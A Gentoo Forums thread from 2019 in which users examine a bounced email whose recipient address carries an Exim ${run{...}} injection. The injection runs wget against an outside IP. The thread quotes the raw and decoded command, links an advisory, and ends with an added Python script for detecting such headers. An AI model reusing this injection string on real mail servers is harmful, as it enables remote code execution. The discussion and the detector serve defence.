Gentoo Forums
recent mail exploit... anyone know anything about this?
eccerr0r
Watchman


Joined: 01 Jul 2004
Posts: 7380
Location: almost Mile High in the USA

PostPosted: Tue Jul 16, 2019 4:53 pm    Post subject: recent mail exploit... anyone know anything about this?

My mail server just bounced a mail that looks like this:

Code:
Return-Path: <root@sab.com>
Received: from sab.com (tscoco07.arvixevps.com [162.254.165.222])
    by MYMAILSERVER (8.14.9/8.14.4) with SMTP id MYCUSTOMID
    for <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20199.204.214.40\x2fsbz\x2fMYIPADDR\x22}}@MYMAILSERVER>; SENTDATE
Date: RECVDATE
From: root@sab.com
Message-Id: <CUSTOMID@MYMAILSERVER>
Received: 1
Received: 2
Received: 3
Received: 4
... to Received: 31
MYMAILSERVER, MYCUSTOMID, MYIPADDR, SENTDATE, RECVDATE, CUSTOMID are, I hope, self-explanatory for an SMTP system and are obscured for privacy.

Seems like either an MTA or MUA exploit, but seems more aimed at software parsing these for anti-spam or anti-virus?
_________________
Intel Core i7 2700K@ 4.1GHz/HD3000 graphics/8GB DDR3/180GB SSD
What am I supposed watching?
bunder
Bodhisattva


Joined: 10 Apr 2004
Posts: 5907

PostPosted: Tue Jul 16, 2019 5:57 pm

Exim maybe?

https://security.gentoo.org/glsa/201906-01

edit: could easily be a web based exploit on the remote server as well
_________________
Neddyseagoon wrote:
The problem with leaving is that you can only do it once and it reduces your influence.

banned from #gentoo since sept 2017
Anon-E-moose
Advocate


Joined: 23 May 2008
Posts: 4362
Location: Dallas area

PostPosted: Tue Jul 16, 2019 6:17 pm

I would imagine the sending server got compromised and you're not the only one to get mail.
_________________
Asus m5a99fx, FX 8320 - nouveau, oss4, rx550 for qemu passthrough
Acer laptop E5-575, i3-7100u - i965, alsa
---both---
5.0.13 zen kernel, profile 17.1 (no-pie & modified) amd64-no-multilib
gcc 8.2.0, eudev, openrc, openbox, palemoon
eccerr0r
Watchman


Joined: 01 Jul 2004
Posts: 7380
Location: almost Mile High in the USA

PostPosted: Tue Jul 16, 2019 6:41 pm

Yeah, it could be Exim. Indeed, it was probably broadcast across as many servers as it could figure out, and one of those landed on my machine.

I'm still using sendmail -- just hoping it's not affected. I need to work on reissuing my certificates, just had a few expire on me, yikes.
_________________
Intel Core i7 2700K@ 4.1GHz/HD3000 graphics/8GB DDR3/180GB SSD
What am I supposed watching?
freke
Guru


Joined: 23 Jan 2003
Posts: 547
Location: Somewhere in Denmark

PostPosted: Wed Jul 17, 2019 3:22 pm

It looks like this:

https://forums.gentoo.org/viewtopic-t-1098284.html

Which seems to be an Exim exploit, yes...

https://malwaredecoder.com/result/61182e83b606f8fd697901db5c05e257

Seems to suggest it tries to run - run{/bin/sh\t-c\t"wget 199.204.214.40/sbz/198.238.214.15"}
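For anyone wanting to spot this pattern in their own logs or bounced headers, here is a small added detection script (written for this thread, not code from any poster or from Exim). It finds Exim `${run{...}}` string-expansion injections in recipient addresses and decodes the `\xNN`/`\t` escapes so the attempted command is readable; the sample header below is constructed from the first post, with the same placeholders.

```python
import re

# Exim string-expansion injection as seen in the thread: ${run{<command>}}
# embedded in the local part of a recipient address.
RUN_EXPANSION = re.compile(r"\$\{run\{(?P<body>[^}]*)\}\}")
HEX_ESCAPE = re.compile(r"\\x([0-9A-Fa-f]{2})")
NAMED_ESCAPES = {"t": "\t", "n": "\n", "r": "\r"}


def decode_escapes(text):
    """Turn the \\xNN and \\t escapes used in the injected address into plain text."""
    text = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), text)
    return re.sub(r"\\([tnr])", lambda m: NAMED_ESCAPES[m.group(1)], text)


def find_run_injections(headers):
    """Return the decoded command of every ${run{...}} expansion found in headers."""
    return [decode_escapes(m.group("body")) for m in RUN_EXPANSION.finditer(headers)]


# Constructed sample modelled on the header quoted in the first post;
# MYMAILSERVER, MYCUSTOMID, MYIPADDR and SENTDATE are the poster's placeholders.
SAMPLE_HEADERS = """\
Return-Path: <root@sab.com>
Received: from sab.com (tscoco07.arvixevps.com [162.254.165.222])
    by MYMAILSERVER (8.14.9/8.14.4) with SMTP id MYCUSTOMID
    for <root+${run{\\x2Fbin\\x2Fsh\\t-c\\t\\x22wget\\x20199.204.214.40\\x2fsbz\\x2fMYIPADDR\\x22}}@MYMAILSERVER>; SENTDATE
From: root@sab.com
"""

if __name__ == "__main__":
    for command in find_run_injections(SAMPLE_HEADERS):
        # Prints the decoded command so the attempt can be triaged and blocked.
        print("suspicious ${run{}} expansion in recipient, decodes to:", repr(command))
```

Feed it `grep -h 'run{' /var/log/mail.log` or a saved bounce, and anything it prints is an injection attempt against the Exim flaw covered by the GLSA linked above; a clean (patched) server should simply reject the address.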